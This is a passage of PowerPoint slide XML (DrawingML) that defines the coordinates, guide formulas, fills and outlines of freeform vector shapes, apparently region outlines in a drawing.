                  <a:gd name="T26" fmla="*/ 11 w 69"/>
                  <a:gd name="T27" fmla="*/ 17 h 77"/>
                  <a:gd name="T28" fmla="*/ 11 w 69"/>
                  <a:gd name="T29" fmla="*/ 15 h 77"/>
                  <a:gd name="T30" fmla="*/ 11 w 69"/>
                  <a:gd name="T31" fmla="*/ 11 h 77"/>
                  <a:gd name="T32" fmla="*/ 11 w 69"/>
                  <a:gd name="T33" fmla="*/ 10 h 77"/>
                  <a:gd name="T34" fmla="*/ 12 w 69"/>
                  <a:gd name="T35" fmla="*/ 10 h 77"/>
                  <a:gd name="T36" fmla="*/ 25 w 69"/>
                  <a:gd name="T37" fmla="*/ 18 h 77"/>
                  <a:gd name="T38" fmla="*/ 28 w 69"/>
                  <a:gd name="T39" fmla="*/ 20 h 77"/>
                  <a:gd name="T40" fmla="*/ 30 w 69"/>
                  <a:gd name="T41" fmla="*/ 20 h 77"/>
                  <a:gd name="T42" fmla="*/ 38 w 69"/>
                  <a:gd name="T43" fmla="*/ 14 h 77"/>
                  <a:gd name="T44" fmla="*/ 59 w 69"/>
                  <a:gd name="T45" fmla="*/ 1 h 77"/>
                  <a:gd name="T46" fmla="*/ 60 w 69"/>
                  <a:gd name="T47" fmla="*/ 0 h 77"/>
                  <a:gd name="T48" fmla="*/ 66 w 69"/>
                  <a:gd name="T49" fmla="*/ 14 h 77"/>
                  <a:gd name="T50" fmla="*/ 68 w 69"/>
                  <a:gd name="T51" fmla="*/ 20 h 77"/>
                  <a:gd name="T52" fmla="*/ 69 w 69"/>
                  <a:gd name="T53" fmla="*/ 21 h 77"/>
                  <a:gd name="T54" fmla="*/ 66 w 69"/>
                  <a:gd name="T55" fmla="*/ 24 h 77"/>
                  <a:gd name="T56" fmla="*/ 64 w 69"/>
                  <a:gd name="T57" fmla="*/ 26 h 77"/>
                  <a:gd name="T58" fmla="*/ 57 w 69"/>
                  <a:gd name="T59" fmla="*/ 28 h 77"/>
                  <a:gd name="T60" fmla="*/ 39 w 69"/>
                  <a:gd name="T61" fmla="*/ 33 h 77"/>
                  <a:gd name="T62" fmla="*/ 34 w 69"/>
                  <a:gd name="T63" fmla="*/ 35 h 77"/>
                  <a:gd name="T64" fmla="*/ 42 w 69"/>
                  <a:gd name="T65" fmla="*/ 46 h 77"/>
                  <a:gd name="T66" fmla="*/ 47 w 69"/>
                  <a:gd name="T67" fmla="*/ 53 h 77"/>
                  <a:gd name="T68" fmla="*/ 42 w 69"/>
                  <a:gd name="T69" fmla="*/ 59 h 77"/>
                  <a:gd name="T70" fmla="*/ 38 w 69"/>
                  <a:gd name="T71" fmla="*/ 62 h 77"/>
                  <a:gd name="T72" fmla="*/ 37 w 69"/>
                  <a:gd name="T73" fmla="*/ 63 h 77"/>
                  <a:gd name="T74" fmla="*/ 28 w 69"/>
                  <a:gd name="T75" fmla="*/ 66 h 77"/>
                  <a:gd name="T76" fmla="*/ 24 w 69"/>
                  <a:gd name="T77" fmla="*/ 71 h 77"/>
                  <a:gd name="T78" fmla="*/ 18 w 69"/>
                  <a:gd name="T79" fmla="*/ 77 h 77"/>
                  <a:gd name="T80" fmla="*/ 3 w 69"/>
                  <a:gd name="T81" fmla="*/ 75 h 77"/>
                  <a:gd name="T82" fmla="*/ 2 w 69"/>
                  <a:gd name="T83" fmla="*/ 75 h 77"/>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69"/>
                  <a:gd name="T127" fmla="*/ 0 h 77"/>
                  <a:gd name="T128" fmla="*/ 69 w 69"/>
                  <a:gd name="T129" fmla="*/ 77 h 77"/>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69" h="77">
                    <a:moveTo>
                      <a:pt x="2" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="75"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36420" name="Freeform 152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2968" y="2768"/>
                <a:ext cx="204" cy="142"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 204"/>
                  <a:gd name="T1" fmla="*/ 139 h 142"/>
                  <a:gd name="T2" fmla="*/ 20 w 204"/>
                  <a:gd name="T3" fmla="*/ 127 h 142"/>
                  <a:gd name="T4" fmla="*/ 10 w 204"/>
                  <a:gd name="T5" fmla="*/ 116 h 142"/>
                  <a:gd name="T6" fmla="*/ 7 w 204"/>
                  <a:gd name="T7" fmla="*/ 106 h 142"/>
                  <a:gd name="T8" fmla="*/ 2 w 204"/>
                  <a:gd name="T9" fmla="*/ 97 h 142"/>
                  <a:gd name="T10" fmla="*/ 0 w 204"/>
                  <a:gd name="T11" fmla="*/ 83 h 142"/>
                  <a:gd name="T12" fmla="*/ 1 w 204"/>
                  <a:gd name="T13" fmla="*/ 79 h 142"/>
                  <a:gd name="T14" fmla="*/ 8 w 204"/>
                  <a:gd name="T15" fmla="*/ 72 h 142"/>
                  <a:gd name="T16" fmla="*/ 16 w 204"/>
                  <a:gd name="T17" fmla="*/ 57 h 142"/>
                  <a:gd name="T18" fmla="*/ 19 w 204"/>
                  <a:gd name="T19" fmla="*/ 57 h 142"/>
                  <a:gd name="T20" fmla="*/ 23 w 204"/>
                  <a:gd name="T21" fmla="*/ 56 h 142"/>
                  <a:gd name="T22" fmla="*/ 37 w 204"/>
                  <a:gd name="T23" fmla="*/ 56 h 142"/>
                  <a:gd name="T24" fmla="*/ 40 w 204"/>
                  <a:gd name="T25" fmla="*/ 56 h 142"/>
                  <a:gd name="T26" fmla="*/ 49 w 204"/>
                  <a:gd name="T27" fmla="*/ 51 h 142"/>
                  <a:gd name="T28" fmla="*/ 61 w 204"/>
                  <a:gd name="T29" fmla="*/ 50 h 142"/>
                  <a:gd name="T30" fmla="*/ 65 w 204"/>
                  <a:gd name="T31" fmla="*/ 48 h 142"/>
                  <a:gd name="T32" fmla="*/ 71 w 204"/>
                  <a:gd name="T33" fmla="*/ 34 h 142"/>
                  <a:gd name="T34" fmla="*/ 75 w 204"/>
                  <a:gd name="T35" fmla="*/ 32 h 142"/>
                  <a:gd name="T36" fmla="*/ 93 w 204"/>
                  <a:gd name="T37" fmla="*/ 31 h 142"/>
                  <a:gd name="T38" fmla="*/ 114 w 204"/>
                  <a:gd name="T39" fmla="*/ 13 h 142"/>
                  <a:gd name="T40" fmla="*/ 115 w 204"/>
                  <a:gd name="T41" fmla="*/ 7 h 142"/>
                  <a:gd name="T42" fmla="*/ 125 w 204"/>
                  <a:gd name="T43" fmla="*/ 1 h 142"/>
                  <a:gd name="T44" fmla="*/ 129 w 204"/>
                  <a:gd name="T45" fmla="*/ 0 h 142"/>
                  <a:gd name="T46" fmla="*/ 143 w 204"/>
                  <a:gd name="T47" fmla="*/ 14 h 142"/>
                  <a:gd name="T48" fmla="*/ 146 w 204"/>
                  <a:gd name="T49" fmla="*/ 22 h 142"/>
                  <a:gd name="T50" fmla="*/ 143 w 204"/>
                  <a:gd name="T51" fmla="*/ 37 h 142"/>
                  <a:gd name="T52" fmla="*/ 150 w 204"/>
                  <a:gd name="T53" fmla="*/ 39 h 142"/>
                  <a:gd name="T54" fmla="*/ 154 w 204"/>
                  <a:gd name="T55" fmla="*/ 39 h 142"/>
                  <a:gd name="T56" fmla="*/ 157 w 204"/>
                  <a:gd name="T57" fmla="*/ 45 h 142"/>
                  <a:gd name="T58" fmla="*/ 168 w 204"/>
                  <a:gd name="T59" fmla="*/ 50 h 142"/>
                  <a:gd name="T60" fmla="*/ 172 w 204"/>
                  <a:gd name="T61" fmla="*/ 53 h 142"/>
                  <a:gd name="T62" fmla="*/ 173 w 204"/>
                  <a:gd name="T63" fmla="*/ 59 h 142"/>
                  <a:gd name="T64" fmla="*/ 180 w 204"/>
                  <a:gd name="T65" fmla="*/ 64 h 142"/>
                  <a:gd name="T66" fmla="*/ 186 w 204"/>
                  <a:gd name="T67" fmla="*/ 69 h 142"/>
                  <a:gd name="T68" fmla="*/ 188 w 204"/>
                  <a:gd name="T69" fmla="*/ 77 h 142"/>
                  <a:gd name="T70" fmla="*/ 193 w 204"/>
                  <a:gd name="T71" fmla="*/ 81 h 142"/>
                  <a:gd name="T72" fmla="*/ 203 w 204"/>
                  <a:gd name="T73" fmla="*/ 86 h 142"/>
                  <a:gd name="T74" fmla="*/ 203 w 204"/>
                  <a:gd name="T75" fmla="*/ 93 h 142"/>
                  <a:gd name="T76" fmla="*/ 200 w 204"/>
                  <a:gd name="T77" fmla="*/ 95 h 142"/>
                  <a:gd name="T78" fmla="*/ 191 w 204"/>
                  <a:gd name="T79" fmla="*/ 97 h 142"/>
                  <a:gd name="T80" fmla="*/ 184 w 204"/>
                  <a:gd name="T81" fmla="*/ 94 h 142"/>
                  <a:gd name="T82" fmla="*/ 173 w 204"/>
                  <a:gd name="T83" fmla="*/ 92 h 142"/>
                  <a:gd name="T84" fmla="*/ 171 w 204"/>
                  <a:gd name="T85" fmla="*/ 98 h 142"/>
                  <a:gd name="T86" fmla="*/ 166 w 204"/>
                  <a:gd name="T87" fmla="*/ 98 h 142"/>
                  <a:gd name="T88" fmla="*/ 156 w 204"/>
                  <a:gd name="T89" fmla="*/ 97 h 142"/>
                  <a:gd name="T90" fmla="*/ 143 w 204"/>
                  <a:gd name="T91" fmla="*/ 104 h 142"/>
                  <a:gd name="T92" fmla="*/ 137 w 204"/>
                  <a:gd name="T93" fmla="*/ 101 h 142"/>
                  <a:gd name="T94" fmla="*/ 132 w 204"/>
                  <a:gd name="T95" fmla="*/ 101 h 142"/>
                  <a:gd name="T96" fmla="*/ 126 w 204"/>
                  <a:gd name="T97" fmla="*/ 112 h 142"/>
                  <a:gd name="T98" fmla="*/ 108 w 204"/>
                  <a:gd name="T99" fmla="*/ 108 h 142"/>
                  <a:gd name="T100" fmla="*/ 94 w 204"/>
                  <a:gd name="T101" fmla="*/ 104 h 142"/>
                  <a:gd name="T102" fmla="*/ 90 w 204"/>
                  <a:gd name="T103" fmla="*/ 100 h 142"/>
                  <a:gd name="T104" fmla="*/ 82 w 204"/>
                  <a:gd name="T105" fmla="*/ 95 h 142"/>
                  <a:gd name="T106" fmla="*/ 74 w 204"/>
                  <a:gd name="T107" fmla="*/ 98 h 142"/>
                  <a:gd name="T108" fmla="*/ 66 w 204"/>
                  <a:gd name="T109" fmla="*/ 107 h 142"/>
                  <a:gd name="T110" fmla="*/ 66 w 204"/>
                  <a:gd name="T111" fmla="*/ 112 h 142"/>
                  <a:gd name="T112" fmla="*/ 66 w 204"/>
                  <a:gd name="T113" fmla="*/ 119 h 142"/>
                  <a:gd name="T114" fmla="*/ 59 w 204"/>
                  <a:gd name="T115" fmla="*/ 122 h 142"/>
                  <a:gd name="T116" fmla="*/ 48 w 204"/>
                  <a:gd name="T117" fmla="*/ 120 h 142"/>
                  <a:gd name="T118" fmla="*/ 39 w 204"/>
                  <a:gd name="T119" fmla="*/ 121 h 142"/>
                  <a:gd name="T120" fmla="*/ 34 w 204"/>
                  <a:gd name="T121" fmla="*/ 123 h 142"/>
                  <a:gd name="T122" fmla="*/ 31 w 204"/>
                  <a:gd name="T123" fmla="*/ 136 h 142"/>
                  <a:gd name="T124" fmla="*/ 26 w 204"/>
                  <a:gd name="T125" fmla="*/ 142 h 14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204"/>
                  <a:gd name="T190" fmla="*/ 0 h 142"/>
                  <a:gd name="T191" fmla="*/ 204 w 204"/>
                  <a:gd name="T192" fmla="*/ 142 h 14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204" h="142">
                    <a:moveTo>
                      <a:pt x="26" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="142"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36421" name="Freeform 153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2968" y="2768"/>
                <a:ext cx="204" cy="142"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 204"/>
                  <a:gd name="T1" fmla="*/ 139 h 142"/>
                  <a:gd name="T2" fmla="*/ 20 w 204"/>
                  <a:gd name="T3" fmla="*/ 127 h 142"/>
                  <a:gd name="T4" fmla="*/ 10 w 204"/>
                  <a:gd name="T5" fmla="*/ 116 h 142"/>
                  <a:gd name="T6" fmla="*/ 7 w 204"/>
                  <a:gd name="T7" fmla="*/ 106 h 142"/>
                  <a:gd name="T8" fmla="*/ 2 w 204"/>
                  <a:gd name="T9" fmla="*/ 97 h 142"/>
                  <a:gd name="T10" fmla="*/ 0 w 204"/>
                  <a:gd name="T11" fmla="*/ 83 h 142"/>
                  <a:gd name="T12" fmla="*/ 1 w 204"/>
                  <a:gd name="T13" fmla="*/ 79 h 142"/>
                  <a:gd name="T14" fmla="*/ 8 w 204"/>
                  <a:gd name="T15" fmla="*/ 72 h 142"/>
                  <a:gd name="T16" fmla="*/ 16 w 204"/>
                  <a:gd name="T17" fmla="*/ 57 h 142"/>
                  <a:gd name="T18" fmla="*/ 19 w 204"/>
                  <a:gd name="T19" fmla="*/ 57 h 142"/>
                  <a:gd name="T20" fmla="*/ 23 w 204"/>
                  <a:gd name="T21" fmla="*/ 56 h 142"/>
                  <a:gd name="T22" fmla="*/ 37 w 204"/>
                  <a:gd name="T23" fmla="*/ 56 h 142"/>
                  <a:gd name="T24" fmla="*/ 40 w 204"/>
                  <a:gd name="T25" fmla="*/ 56 h 142"/>
                  <a:gd name="T26" fmla="*/ 49 w 204"/>
                  <a:gd name="T27" fmla="*/ 51 h 142"/>
                  <a:gd name="T28" fmla="*/ 61 w 204"/>
                  <a:gd name="T29" fmla="*/ 50 h 142"/>
                  <a:gd name="T30" fmla="*/ 65 w 204"/>
                  <a:gd name="T31" fmla="*/ 48 h 142"/>
                  <a:gd name="T32" fmla="*/ 71 w 204"/>
                  <a:gd name="T33" fmla="*/ 34 h 142"/>
                  <a:gd name="T34" fmla="*/ 75 w 204"/>
                  <a:gd name="T35" fmla="*/ 32 h 142"/>
                  <a:gd name="T36" fmla="*/ 93 w 204"/>
                  <a:gd name="T37" fmla="*/ 31 h 142"/>
                  <a:gd name="T38" fmla="*/ 114 w 204"/>
                  <a:gd name="T39" fmla="*/ 13 h 142"/>
                  <a:gd name="T40" fmla="*/ 115 w 204"/>
                  <a:gd name="T41" fmla="*/ 7 h 142"/>
                  <a:gd name="T42" fmla="*/ 125 w 204"/>
                  <a:gd name="T43" fmla="*/ 1 h 142"/>
                  <a:gd name="T44" fmla="*/ 129 w 204"/>
                  <a:gd name="T45" fmla="*/ 0 h 142"/>
                  <a:gd name="T46" fmla="*/ 143 w 204"/>
                  <a:gd name="T47" fmla="*/ 14 h 142"/>
                  <a:gd name="T48" fmla="*/ 146 w 204"/>
                  <a:gd name="T49" fmla="*/ 22 h 142"/>
                  <a:gd name="T50" fmla="*/ 143 w 204"/>
                  <a:gd name="T51" fmla="*/ 37 h 142"/>
                  <a:gd name="T52" fmla="*/ 150 w 204"/>
                  <a:gd name="T53" fmla="*/ 39 h 142"/>
                  <a:gd name="T54" fmla="*/ 154 w 204"/>
                  <a:gd name="T55" fmla="*/ 39 h 142"/>
                  <a:gd name="T56" fmla="*/ 157 w 204"/>
                  <a:gd name="T57" fmla="*/ 45 h 142"/>
                  <a:gd name="T58" fmla="*/ 168 w 204"/>
                  <a:gd name="T59" fmla="*/ 50 h 142"/>
                  <a:gd name="T60" fmla="*/ 172 w 204"/>
                  <a:gd name="T61" fmla="*/ 53 h 142"/>
                  <a:gd name="T62" fmla="*/ 173 w 204"/>
                  <a:gd name="T63" fmla="*/ 59 h 142"/>
